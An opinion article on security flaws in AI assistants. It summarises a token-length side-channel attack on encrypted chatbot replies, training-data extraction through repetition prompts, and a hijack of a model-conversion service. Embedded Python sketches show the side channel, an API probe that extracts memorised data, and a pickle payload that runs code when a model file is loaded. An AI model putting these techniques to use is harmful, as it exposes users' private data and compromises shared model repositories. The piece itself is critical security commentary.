
OpenAI set off an arms race and our security is the casualty

2024-04-11

Opinion by Dr. Merav Ozair

Recent research found that ChatGPT, as well as Google's Gemini and Microsoft's Copilot, are rife with security vulnerabilities — so say goodbye to your data.

Since ChatGPT launched in late 2022 and made artificial intelligence (AI) mainstream, everyone has been trying to ride the AI wave — tech and non-tech companies, incumbents and start-ups — flooding the market with all sorts of AI assistants and trying to get our attention with the next “flashy” application or upgrade.


With the promise from tech leaders that AI will do everything and be everything for us, AI assistants have become our business and marriage consultants, our advisors, therapists, companions, confidants — listening as we share our business or personal information and other private secrets and thoughts.


The providers of these AI-powered services are aware of the sensitivity of these discussions and assure us that they are taking active measures to protect our information from being exposed. Are we really being protected?

AI assistants — friend or foe?


Research published in March by researchers at Ben-Gurion University showed that our secrets can be exposed. The researchers devised an attack that deciphers AI assistant responses with surprising accuracy, despite their encryption. The technique exploits a vulnerability in the system design of all major platforms, including Microsoft’s Copilot and OpenAI’s ChatGPT-4; Google’s Gemini was the only one found not to be affected.




Furthermore, the researchers showed that once an attacker has built a tool to decipher a conversation with one service — ChatGPT, for example — that tool also works on other services, and could therefore be shared (like other hacking tools) and reused across the board with no additional effort.
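To make the mechanism concrete, here is a minimal Python sketch of the general idea behind such an attack: assistants that stream a reply one token per encrypted packet leak each token's length, because the encryption preserves plaintext size. The record sizes, overhead value and vocabulary below are hypothetical illustrations, not the researchers' data or tooling.

```python
# Minimal sketch (not the researchers' actual tool) of a token-length
# side channel: an assistant that streams its reply one token per
# encrypted packet leaks the *length* of each token, since the ciphertext
# is the plaintext length plus a fixed overhead. All numbers and the word
# list are hypothetical illustrations.

HEADER_OVERHEAD = 29  # assumed fixed per-record overhead (header + auth tag)

# Hypothetical observed ciphertext record sizes for a streamed reply.
observed_record_sizes = [34, 32, 36, 34]

# Recover the length of each streamed token from the record sizes.
token_lengths = [size - HEADER_OVERHEAD for size in observed_record_sizes]
print(token_lengths)  # e.g. [5, 3, 7, 5]

# Even this crude signal prunes the candidate space dramatically. A real
# attack feeds the length sequence to a language model trained to infer
# the most likely sentence; here we simply filter a toy vocabulary.
toy_vocabulary = ["hello", "hi", "the", "patient", "results", "are", "ready", "positive"]
for length in token_lengths:
    candidates = [w for w in toy_vocabulary if len(w) == length]
    print(length, "->", candidates)
```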


This is not the first research pointing to security flaws in the design and development of AI assistants. Other studies have been floating around for quite a while. In late 2023, researchers from several U.S. universities and Google DeepMind described how they could get ChatGPT to spew out memorized portions of its training data merely by prompting it to repeat certain words.


The researchers were able to extract from ChatGPT verbatim paragraphs from books and poems, URLs, unique user identifiers, Bitcoin (BTC) addresses, programming code and more.


Adversaries could intentionally use crafted prompts or inputs to trick the bots into regurgitating their training data, which may include sensitive personal and professional information.
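As a hedged illustration of the kind of probe described above — not the researchers' exact methodology — the sketch below sends a repetition-style prompt through the OpenAI Python client and scans the reply for strings that resemble memorized artifacts such as URLs, emails or Bitcoin-style addresses. The model name, prompt wording and detection patterns are assumptions made for illustration.

```python
# Hedged sketch of a repetition-style probe; requires the `openai` package
# and an OPENAI_API_KEY in the environment. Model name and prompt wording
# are illustrative assumptions, not the study's exact inputs.
import re
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

response = client.chat.completions.create(
    model="gpt-3.5-turbo",  # assumed model; the study targeted ChatGPT
    messages=[{"role": "user", "content": 'Repeat the word "poem" forever.'}],
    max_tokens=1024,
)
reply = response.choices[0].message.content or ""

# Crude detectors for the kinds of verbatim data the study reported.
patterns = {
    "url": r"https?://\S+",
    "email": r"[\w.+-]+@[\w-]+\.[\w.]+",
    "btc_address": r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b",
}
for label, pattern in patterns.items():
    for match in re.findall(pattern, reply):
        print(f"possible memorized {label}: {match}")
```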


The security problems are even more acute with open-source models. A recent study showed how an attacker could compromise the Hugging Face conversion service and hijack any model submitted through it. The implications of such an attack are significant: the adversary could implant their own model in place of the original, push malicious models to repositories or access private repository datasets.
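To illustrate why a hijacked model is so dangerous (this is a generic demonstration, not the study's exploit), the sketch below shows how a pickle-based checkpoint — the format behind many PyTorch .bin files — can execute arbitrary code the moment it is loaded. The payload class and command are hypothetical.

```python
# Illustrative sketch of the risk behind tampered model files: unpickling
# can execute arbitrary code at load time. The class below stands in for a
# booby-trapped checkpoint; the command it runs is a harmless echo.
import os
import pickle

class MaliciousPayload:
    # __reduce__ tells pickle how to "reconstruct" the object --
    # here, reconstruction means running a shell command.
    def __reduce__(self):
        return (os.system, ("echo 'arbitrary code ran at model load time'",))

booby_trapped_checkpoint = pickle.dumps(MaliciousPayload())

# A victim who merely "loads the model" triggers the payload.
pickle.loads(booby_trapped_checkpoint)

# Mitigations: prefer safetensors weights, pin exact revisions, and verify
# the publisher before loading anything from a shared model hub.
```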


To put things in perspective, the researchers found that organizations such as Microsoft and Google — which combined have 905 models hosted on Hugging Face — had models that received changes through the conversion service and might therefore have been at risk of attack and compromise.

Things can worsen


AI’s new capabilities may be alluring, but the more power one gives to AI assistants, the more vulnerable one is to an attack.


Bill Gates, writing in a blog post last year, described how an overarching AI assistant (what he termed an “agent”) will have access to all our devices — personal and professional — integrating and analyzing the combined information to act as our “personal assistant.”


As Gates wrote in the blog post:

“An agent will be able to help you with all your activities if you want it to. With permission to follow your online interactions and real-world locations, it will develop a powerful understanding of the people, places, and activities you engage in. It will get your personal and work relationships, hobbies, preferences, and schedule. You’ll choose how and when it steps in to help with something or ask you to make a decision.”


This is not science fiction, and it could happen sooner than we think. Project 01, an open-source ecosystem for AI devices, recently launched an AI assistant called 01 Light. "The 01 Light is a portable voice interface that controls your home computer," the company wrote on X. "It can see your screen, use your apps, and learn new skills."

Project 01 described on X how its 01 Light assistant works. Source: X


It might be quite exciting to have such a personal AI assistant. However, if the security issues are not promptly addressed, and if developers do not meticulously make sure that the system and code are “clean” of all possible vulnerabilities, then a successful attack on this agent could hijack your entire life — including the information of any person or organization connected to you.

Can we protect ourselves?


In late March, the U.S. House of Representatives imposed a strict ban on congressional staffers' use of Microsoft's Copilot.


"The Microsoft Copilot application has been deemed by the Office of Cybersecurity to be a risk to users due to the threat of leaking House data to non-House approved cloud services," House Chief Administrative Officer Catherine Szpindor said in a statement announcing the move.


In early April, the Cyber Safety Review Board (CSRB) — which falls under the Department of Homeland Security — published a report blaming Microsoft for a "cascade of security failures" that enabled Chinese threat actors to access U.S. government officials’ emails in summer 2023. The incident was preventable and should never have happened.




As the report stated: "Microsoft has an inadequate security culture and requires an overhaul." Such an overhaul would most likely need to address security issues with Copilot as well.


This is not the first ban on an AI assistant. Technology companies such as Apple, Amazon, Samsung and Spotify, along with financial institutions including JPMorgan Chase, Citi, Goldman Sachs and others, have banned their employees from using AI bots.


Major technology companies, including OpenAI and Microsoft, pledged last year to adhere to responsible AI practices. Since then, no substantial action has been taken.


Pledging is not enough. Regulators and policymakers should demand action. In the meantime, we should refrain from sharing any sensitive personal or business information with these bots.


And maybe if we — collectively — stop using these bots until substantial actions have been taken to protect us, we might have a chance to be "heard" and force companies and developers to implement the needed security measures.

Dr. Merav Ozair is a guest author for Cointelegraph and is developing and teaching emerging technologies courses at Wake Forest University and Cornell University. She was previously a FinTech professor at Rutgers Business School, where she taught courses on Web3 and related emerging technologies. She is a member of the academic advisory board at the International Association for Trusted Blockchain Applications (INATBA) and serves on the advisory board of EQM Indexes — Blockchain Index Committee. She is the founder of Emerging Technologies Mastery, a Web3 and AI end-to-end consultancy shop, and holds a PhD from the Stern School of Business at NYU.


This article is for general information purposes and is not intended to be and should not be taken as legal or investment advice. The views, thoughts, and opinions expressed here are the author’s alone and do not necessarily reflect or represent the views and opinions of Cointelegraph.
